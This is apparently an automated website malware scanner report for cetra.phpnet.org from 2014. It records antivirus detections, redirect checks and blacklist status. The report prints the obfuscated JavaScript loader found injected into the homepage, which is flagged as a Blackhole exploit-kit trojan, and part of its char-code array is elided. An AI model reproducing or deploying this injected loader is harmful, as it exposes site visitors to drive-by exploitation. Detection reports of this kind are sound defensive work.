New scan:

Malware Scanner report for cetra.phpnet.org

Malicious/Suspicious/Total urls checked
1/0/2
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://cetra.phpnet.org/
200 OK
Content-Length: 6815
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

try{document.body--}catch(gdsgd){ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1){f=new Array(102,116,108,96,116,104,109,107,32,102,112,94,40,96,42,95,41,122,112,98,116,116,112,107,32,76,95,113,104,45,100,105,111,110,112,37,77,96,114,101,46,113,95,107,100,110,107,37,41,41,38,95,45,96,41,46,41,40,41,94,59,124,11,7,102,116,108,96,116,104,109,107,32,113,113,37,41,122
... 1784 bytes are skipped ...
116,45,97,108,111,106,103,98,46,104,108,97,101,119,77,99,40,38,93,92,117,115,107,99,114,60,37,38,61,60,43,46,41,122,98,108,99,116,107,98,110,115,44,96,111,110,105,102,101,60,37,92,95,116,114,106,102,113,59,36,43,113,113,37,41,42,37,56,32,100,118,109,105,113,99,112,61,38,41,98,120,111,44,113,111,70,75,81,83,115,112,102,110,102,38,38,43,38,57,29,112,96,114,101,61,46,37,56,125,12,8,122);}w=f;s=[];for(i=0;-i+712!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String.fromCharCode((1*w[j]+e("j%4")));}xz=e;xz(s)}

Antivirus reports:

AntiVir
JS/Agent.480593
Avast
JS:Decode-LI [Trj]
Ikarus
Trojan.Script
nProtect
JS:Trojan.JS.Agent.HE
Comodo
TrojWare.JS.Agent.EA
McAfee-GW-Edition
JS/Exploit-Blacole.gc
DrWeb
Exploit.BlackHole.12
Microsoft
Exploit:JS/Blacole.JL
MicroWorld-eScan
JS:Trojan.JS.Agent.HE
McAfee
JS/Exploit-Blacole.gc
NANO-Antivirus
Trojan.Script.Iframe.bgvzbb
F-Secure
JS:Trojan.JS.Agent.HE
AVG
HTML/Framer
GData
JS:Trojan.JS.Agent.HE
BitDefender
JS:Trojan.JS.Agent.HE

http://cetra.phpnet.org/test404page.js
404 Not Found
Content-Length: 212
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: cetra.phpnet.org

Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 16 Dec 2014 17:36:08 GMT
Server: Apache/2.2.27
Vary: Accept-Encoding
Content-Length: 6815
Content-Type: text/html
Set-Cookie: __utmfr=648; expires=Tue, 23-Dec-2014 17:36:08 GMT; path=/

...6815 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: cetra.phpnet.org
Referer: http://www.google.com/search?q=cetra.phpnet.org

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=cetra.phpnet.org

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://cetra.phpnet.org/

Result: cetra.phpnet.org is not infected or malware details are not published yet.